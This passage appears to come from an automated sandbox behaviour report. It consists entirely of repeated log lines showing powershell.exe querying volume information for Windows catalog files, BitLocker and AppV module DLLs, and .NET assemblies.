    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
